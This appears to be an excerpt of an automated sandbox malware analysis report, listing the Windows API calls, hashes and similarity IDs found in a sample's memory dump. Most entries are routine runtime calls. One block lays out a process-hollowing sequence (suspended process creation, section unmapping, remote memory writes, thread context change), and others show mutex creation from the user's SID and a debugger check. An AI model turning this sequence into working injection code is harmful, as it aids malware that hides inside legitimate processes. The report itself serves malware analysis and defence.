                                                                                • Instruction Fuzzy Hash: 2FB12A71500144ABDB04EF28CE85BDE3726AF95319F54423EF888672C6EB3DD9C18799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00412440: Concurrency::cancel_current_task.LIBCPMT ref: 00412561
                                                                                • CreateThread.KERNEL32 ref: 00403856
                                                                                • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,?), ref: 00403863
                                                                                • SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040386A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
                                                                                • String ID:
                                                                                • API String ID: 1039963361-0
                                                                                • Opcode ID: 50c15cdf61fb1fc4b6d0715f087687a063a4c09995a765d34f536c1601250b8f
                                                                                • Instruction ID: 7004d97d11afafeae392a924bad69d4e0811d904fedd8d814c7ed508116f8222
                                                                                • Opcode Fuzzy Hash: 50c15cdf61fb1fc4b6d0715f087687a063a4c09995a765d34f536c1601250b8f
                                                                                • Instruction Fuzzy Hash: AB41E071210148ABEB18DF28CD85BCD3F6AAF85316F50822AF855972D5C77DD6C08B58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _free.LIBCMT ref: 00421D4A
                                                                                • _free.LIBCMT ref: 00421DA0
                                                                                  • Part of subcall function 00421B7C: _free.LIBCMT ref: 00421BD4
                                                                                  • Part of subcall function 00421B7C: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0042F678), ref: 00421BE6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$InformationTimeZone
                                                                                • String ID:
                                                                                • API String ID: 597776487-0
                                                                                • Opcode ID: a57aee05735d0ee82a38767d85209656f360d7a52cd3e9f99fd00689a5667e31
                                                                                • Instruction ID: 878c1ea30b08c9a3dbcd4c0a0de05ef3780ad2d1b9905e881a30390f058fb97e
                                                                                • Opcode Fuzzy Hash: a57aee05735d0ee82a38767d85209656f360d7a52cd3e9f99fd00689a5667e31
                                                                                • Instruction Fuzzy Hash: 1E215472A10135D6C73067356C41EFF7778DFA1324F5002ABE495921A0DB78BEC6855D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0fa85814af43257686d64c8ce6606e388436b67fb7325c5549b01051f200d531
                                                                                • Instruction ID: 3d9c21e33356424c53782de9a4a6fb55634e31a09b17d89eeb973488efcb61ea
                                                                                • Opcode Fuzzy Hash: 0fa85814af43257686d64c8ce6606e388436b67fb7325c5549b01051f200d531
                                                                                • Instruction Fuzzy Hash: 3F210831501608BFEB11AB69DC82BDF3768DF813B8F210316F9342B1C1D7789D418669
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,00415C1A,?,?,00000000,00000000), ref: 00415D11
                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00415C1A,?,?,00000000,00000000), ref: 00415D25
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                • String ID:
                                                                                • API String ID: 1707611234-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00402C50: GetUserNameW.ADVAPI32(00000000,?), ref: 00402C7A
                                                                                  • Part of subcall function 00402C50: GetProcessHeap.KERNEL32(00000008,?), ref: 00402C8F
                                                                                  • Part of subcall function 00402C50: HeapAlloc.KERNEL32(00000000), ref: 00402C92
                                                                                  • Part of subcall function 00402C50: GetUserNameW.ADVAPI32(00000000,?), ref: 00402CA0
                                                                                  • Part of subcall function 00402C50: LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00402CC3
                                                                                  • Part of subcall function 00402C50: GetProcessHeap.KERNEL32(00000008,?), ref: 00402CCE
                                                                                  • Part of subcall function 00402C50: HeapAlloc.KERNEL32(00000000), ref: 00402CD1
                                                                                  • Part of subcall function 00402C50: GetProcessHeap.KERNEL32(00000008,?), ref: 00402CE1
                                                                                  • Part of subcall function 00402C50: HeapAlloc.KERNEL32(00000000), ref: 00402CE4
                                                                                  • Part of subcall function 00402C50: LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00402D0E
                                                                                  • Part of subcall function 00402C50: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00402D21
                                                                                • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 004070F1
                                                                                • GetLastError.KERNEL32 ref: 004070F7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Name$AllocProcess$AccountLookupUser$ConvertCreateErrorLastMutexString
                                                                                • String ID:
                                                                                • API String ID: 3154463122-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00412561
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_task
                                                                                • String ID:
                                                                                • API String ID: 118556049-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 0040638E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 004066EE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 0040680E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 0040692E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00406A4E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00406B6E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00406C8E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00406DAE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00406ECE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __wsopen_s
                                                                                • String ID:
                                                                                • API String ID: 3347428461-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00412EFB,?,?,00413B2E,?,?,?,?,?,00412DCB,00412EFB,?,?,?,?), ref: 00419D4C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,00420ED0,?,?,00000000,?,00420ED0,00000000,0000000C), ref: 00420AFD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 0040318C
                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 004031E5
                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 004031FE
                                                                                • GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 00403213
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 00403236
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,00000000), ref: 0040324E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00403255
                                                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 00403274
                                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 0040328F
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 004032CC
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 004032FC
                                                                                • SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00403312
                                                                                • ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 0040331B
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 00403329
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 00403340
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                • API String ID: 4033543172-1050664331
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00412EFB), ref: 00417DEE
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00412EFB), ref: 00417DF8
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00412EFB), ref: 00417E05
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,004153F0,004053F0,00000000,?,004053F0,?,0041BF8C), ref: 00415413
                                                                                • TerminateProcess.KERNEL32(00000000,?,004153F0,004053F0,00000000,?,004053F0,?,0041BF8C), ref: 0041541A
                                                                                • ExitProcess.KERNEL32 ref: 0041542C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00413469
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FeaturePresentProcessor
                                                                                • String ID:
                                                                                • API String ID: 2325560087-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 0041FD9F
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F955
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F967
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F979
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F98B
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F99D
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F9AF
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F9C1
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F9D3
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F9E5
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F9F7
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041FA09
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041FA1B
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041FA2D
                                                                                • _free.LIBCMT ref: 0041FD94
                                                                                  • Part of subcall function 00419831: HeapFree.KERNEL32(00000000,00000000,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?), ref: 00419847
                                                                                  • Part of subcall function 00419831: GetLastError.KERNEL32(?,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?,?), ref: 00419859
                                                                                • _free.LIBCMT ref: 0041FDB6
                                                                                • _free.LIBCMT ref: 0041FDCB
                                                                                • _free.LIBCMT ref: 0041FDD6
                                                                                • _free.LIBCMT ref: 0041FDF8
                                                                                • _free.LIBCMT ref: 0041FE0B
                                                                                • _free.LIBCMT ref: 0041FE19
                                                                                • _free.LIBCMT ref: 0041FE24
                                                                                • _free.LIBCMT ref: 0041FE5C
                                                                                • _free.LIBCMT ref: 0041FE63
                                                                                • _free.LIBCMT ref: 0041FE80
                                                                                • _free.LIBCMT ref: 0041FE98
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID: pHC
                                                                                • API String ID: 161543041-2093311077
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3907804496
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _free.LIBCMT ref: 0041A020
                                                                                  • Part of subcall function 00419831: HeapFree.KERNEL32(00000000,00000000,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?), ref: 00419847
                                                                                  • Part of subcall function 00419831: GetLastError.KERNEL32(?,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?,?), ref: 00419859
                                                                                • _free.LIBCMT ref: 0041A02C
                                                                                • _free.LIBCMT ref: 0041A037
                                                                                • _free.LIBCMT ref: 0041A042
                                                                                • _free.LIBCMT ref: 0041A04D
                                                                                • _free.LIBCMT ref: 0041A058
                                                                                • _free.LIBCMT ref: 0041A063
                                                                                • _free.LIBCMT ref: 0041A06E
                                                                                • _free.LIBCMT ref: 0041A079
                                                                                • _free.LIBCMT ref: 0041A087
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00413CA7
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00413CAF
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00413D38
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00413D63
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00413DB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm$csm$k8A
                                                                                • API String ID: 1170836740-2549497851
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$___from_strstr_to_strchr
                                                                                • String ID:
                                                                                • API String ID: 3409252457-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 0-537541572
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0041FA9F: _free.LIBCMT ref: 0041FAC4
                                                                                • _free.LIBCMT ref: 0041FB25
